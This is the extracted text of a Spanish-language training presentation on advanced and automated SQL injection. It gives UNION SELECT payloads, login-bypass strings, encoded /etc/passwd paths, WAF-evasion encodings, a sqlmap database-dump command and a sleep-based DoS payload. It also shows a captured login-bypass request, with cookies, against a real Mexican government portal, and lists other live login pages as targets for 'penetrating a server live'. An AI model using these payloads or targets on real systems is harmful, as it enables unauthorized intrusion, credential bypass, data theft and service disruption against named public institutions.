1. Inyecciones SQL Avanzadas yautomatizadas. www.n3xasec.comPentester Rafael Gmez Del ngelDirector de N3XAsecDocente de la certificacin:SIOHE Seguridad Informtica Ofensiva Hacking Etico

2. TEMAS QUE VEREMOS EN LA PONENCIA1.- Identificacin de la vulnerabilidad2.-Estructuracin bsica de una inyeccin3.-Blindando las inyecciones4.-Automatizando las inyecciones5.-Evadiendo Firewall Web6.-Loggin Bypass7.-Dumpeando la base de datos8.-Vulnerando servidores de GOBIERNO9.-Ataques DOS SQLI 3. Que es una inyeccin SQL ? Inyectar Inyectar AQUI !! AQUI !!www.victima.com/index.php?idVulnerable=34GETPOST 4. Mas vulnerabilidades de inyeccin !!XSS RFILDAPCommand Injection LFI 5. Estructura bsica de una inyeccinUna inyeccin esta compuesta bsicamente 3 partes:1.-La sintaxis en lenguaje SQL, union+all+select,2.-Busqueda de numero de tablas 1,2,3,4,5,6,7....(NULL,NULL,NULL)3.- El comando a ejecutar o los datos a obtener @@version id_vulnerable=73+UNION+ALL+SELECT 1,2,3 */* id_vulnerable=73+UNION+ALL+SELECT 1,2,@@version*/*id_vulnerable=73 LIMIT 1,1 UNION ALL SELECT NULL, NULL,CONCAT(0x3a626e653a,0x4f536a56435074746677,0x3a626c713a), NULL, NULL,NULL, NULL# 6. Video de inyeccin e identificacin Bsica !! 7. Blindando las inyecciones SQL !UrlencodeBase 64 encodeL2V0Yy9wYXNzd2Qv== /etc/passwd/ Hexencode2f2a2a2f6574632f7061737377642f2a2a2f /**/**/etc/passwd/**/**/ /**/**/etc/**/**/passwd/**/**/http://www.string-functions.com/ 8. Host=portal2.edomex.gob.mxUser-Agent=Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101Firefox/19.0Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language=es-MX,es-ES;q=0.8,es-AR;q=0.7,es;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding=gzip, deflateReferer=http://portal2.edomex.gob.mx/idcprod/idcplg?IdcService=LOGIN&Action=GetTemplatePage&Page=HOME_PAGE&Auth=InternetCookie=__utma=26329020.1898314859.1361471024.1361478811.1362458074.3; __utmz=26329020.1361478811.2.2.utmcsr=busquedas.edomex.gob.mx|utmccn=(referral)|utmcmd=referral|utmcct=/search/query/browse.jsp;HstCfa704590=1362458074082; HstCla704590=1362458074082;HstCmu704590=1362458074082; HstPn704590=1; HstPt704590=1;HstCnv704590=1; HstCns704590=1;BIGipServerpool_ContentManager_80=3355970058.20480.0000;BIGipServerpool_PortalWebcacheNuevo_7777=1762265610.24862.0000Content-Length=199POSTDATA=username=%27or1%3D1+or+%27%27%3D%27&password=%27or1%3D1+or+%27%27%3D%27&redirecturl=%2Fidcprod%2Fidcplg%3FIdcService%3DLOGIN%26Action%3DGetTemplatePage%26Page%3DHOME_PAGE%26Auth%3DInternet&edit=Login 9. POSTDATA=username=%27or1%3D1+or+%27%27%3D%27&password=%27or1%3D1+or+%27%27%3D%27&redirecturl=%2Fidcprod%2Fidcplg%3FIdcService%3DLOGIN%26Action%3DGetTemplatePage%26Page%3DHOME_PAGE%26Auth%3DInternet&edit=Login 10. LOGGIN BY PASS!!Para pasarnos un loggin Se utiliza la sentencia OR yaque esta significa que si algo es verdadero entoncestodo ser verdadero OR 1=1 . Esto provocar queautomticamente toda la consulta sea verdadera, seacual sea el usuario.1.- V or V = VERDADERO-------------------- OR 1=1 /* 2.- V or F = VERDADERO-------------------- OR 1=0 /* 3.- F or V = VERDADERO-------------------- OR 0=1 /* 4.- F or F = FALSO----------------------------- OR 0=0 /* 11. LOGGIN BY PASS!! admin - - admin # admin /* or 1=1- - or 1=1# or 1=0/* ) or 1=0 1=1- - ) or 1=1 (1=1 - - ) */ 1=0 # 12. Penetrar un servidor en VIVOhttp://salud.edomexico.gob.mx/html/index.phphttp://ddsisem.dyndns.org/activo_fijo/login.php 13. WAFWAF Web Application FirewallWeb Application Firewall 14. Como funciona el WAF ? 15. Detectando WAFDetectando WAF 16. Char Encode til para evadir deteccin de palabrasEl atacante sabe que existen filtros que evitara la llegada de lainyeccin al servidor, el usara una combinacin de caracteres yencriptaciones para saltarse los filtros y el IDS lo reconozca comovalidos. 17. Char-doble encodeCifra en Hexadecimal, til cuando la aplicacin emplea Url encode 18. Char-Unicode EncodeCifrando con el estndarUnicode 19. Automatizacin de inyeccinAutomatizacin de inyeccinHAVIJ SQLMAP 20. Video automatizacin de inyeccin y TampersVideo automatizacin de inyeccin y Tampers 21. Dumpleando la BDDumpleando la BD./sqlmap.py -u www.xxx.sp.php?id=666 --dump -allVIDEO 22. Ataques DOS por inyeccin SQLEste ataque se genera cuando mandamos una consultaMAL formada, de tal manera que cuando el servidor lainterprete cause un conflicto interno o Se confunda Id?=66+Union,concat(0x3,slep(10000000),0x3) */#--)OR#1=2--#Select+from,--(#)-- OR +FROM-- 23. Penetracin a sistemas de gobiernoEs el sector mas atacado por hacktivistas 24. GRACIAS!!! Dudas ?INSCRIPCIONESABIERTAS Diplomado para SIOHE Seguridad Informtica Ofensiva Hacking EticoINICIO 15 DE MAYO2013Plan de financiamiento Informes : info@n3xasec.com Descarga de material y diapositivaswww.n3xasec.com